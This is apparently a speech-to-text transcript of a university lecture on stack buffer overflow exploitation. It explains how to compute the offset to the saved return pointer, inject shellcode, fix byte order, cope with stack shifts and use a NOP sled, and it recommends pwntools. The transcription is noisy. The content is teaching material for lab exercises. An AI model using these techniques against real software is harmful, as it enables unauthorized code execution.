class but this is something that you know that just exists so, oh okay good so this is an example of a main program that has a character buffer foo of 50 that does a shrine copy from arc v1 onto foo and then returns 10 so the idea is looking at this code we can see that the argument to string copy the destination buffer is at EDP minus 32 so how many bytes from the start of the buffer to the save base pointer on the stack no, not 50 or maybe, I don't know actually is it x32 is that 50? okay, that's hoping that's not the same, alright so I think that's actually the preferred stack boundaries too is is making it be the same so we have x32 but the important thing is this 32 is in the assembly that's why I'm not the c code so we know from our buffer we're in a copy there are 32 bytes onto the stack 32 hex which is 50 so that can include our shell code so we can include our 32 bytes of shell code the rest bytes in garbage whatever we want, and then we have 4 bytes of a save base pointer and then we need the 4 bytes of the address on the start of our shell code and so we can set a breakpoint there we can run this, so this is I usually Python to pass in these kind of things I also highly recommend you that at PwnTools it's very nice for interacting with a program and passing these kind of arbitrary inputs to a program and I'm going to briefly walk through it so we are going to get to our string copy where we are then going to so we pass it as our rvvector so our rvvector is up here vfff734 that's rv that's rv and then this address vfff87b which is the string so that's going to be the input that we passed in this function so we basically passed our shell code so we didn't actually overflow anything here so here we are going to do a string copy and we have copied then our 32 bytes of shell code and 33 bytes of shell code plus an old byte onto the stack we actually don't overflow anything and everything went correctly we didn't touch the save instruction pointers this is other important things that I've seen students struggle with it's just injecting shell code onto the stack doesn't magically make anything happen because the cpu doesn't care anything about what you put into memory what it cares about is what's in the IP register and where it goes and executes so we need 33 bytes of shell code 17 random bytes we'll use a's, 4 bytes of a saved and then 4 bytes of our shell code so we can do this same thing so we can do our shell code 17 a's why did I do this backwards that's super weird and then bcde which is the saved face pointer I like to put in a value there so I can actually see it when I'm debugging it onto the stack and I know it's different than my a's of jump and then bfff666 so why did I do that one because when we go back we know our buffer is that bfff666 it's a super auspicious number so we do this we do string copy we copy the shell code 17 a's our base pointer and then bfff666 what's the problem here in this diagram is this going to work when we return so let's step where are we going to start executing at when we return when the rack starts to execute so if we go back you can see I put the instruction in as bfff666 and if I look here when that copies the endianness is the problem so I have to reverse my bytes because it's copied byte by byte so it's going to start going at bfff666 okay that's not going to work it's going to suck fault so we'll need to swap that around bfff646 which that will work but there's another problem here which I need to point out before you start doing this so I use even if I did this correctly bfff666 if I start executing from there is that where the start of my shell code is so where is so my I know at the start right at this call string copy that the argument on the stack is the address of my buffer so here the thing about this, why is the address of my buffer here at bfff646 and in this previous run it's at bfff666 it's a difference of 20 bytes what happened? I'm saving you an hour's of cardiac by the way because the process is memory layout laid out what's at the very top of the process of the process of memory not the kernel, not the data section memory updates to the bottom alright let's somebody remember this 219 the process structure slide at the very very top of the memory ENV the actual values and the RV values the differences between those 2 invocations is I'm passing more data to RV which means that the entire stack shifts down which means that and environment includes the present working directory, the home directory all kinds of stuff which makes this a pain so figuring out from where that address is can be very difficult because it's shifting depending on door input so you need to I've spent many a times debugging and exploiting GDP only to have it fail when actually doing it because the stack changed so keep that in line go back to 219 really quickly okay good we did that we did that now we do it correctly and then we get a shell um and this goes to this point the key problem is you need to get that address right 100% exactly because you need to start executing at the very first byte of your shell code so given the same environment so one trick is to this is why using something like Pone Tools or something that's always going to execute a process with exactly the same memory layout is really handy because a better trick is to use what's known as a Knopf's led so the idea is well if you have to guess the very first instruction of your shell code why not make your shell code longer and at the beginning put in x86 x90 is a no-off so just put as many no-offs so rather than those 17 a's put 17 no-offs and in that way you only have to get anywhere in those to get it depending on the size of your buffer I mean you can make your shell your Knopf's led as big as you want so it's actually really easy you're highly likely to get into there so I wanted to talk about that because that's super important I think I'm going to leave yeah you can okay awesome so yeah so but if your buffer is really small you can try putting shell code into something else I think that's all you need for now like you're already all capable of doing the first five levels for sure this will get you a lot a lot of the way they are different concepts so home tools you can place your Python script to pass let's talk about class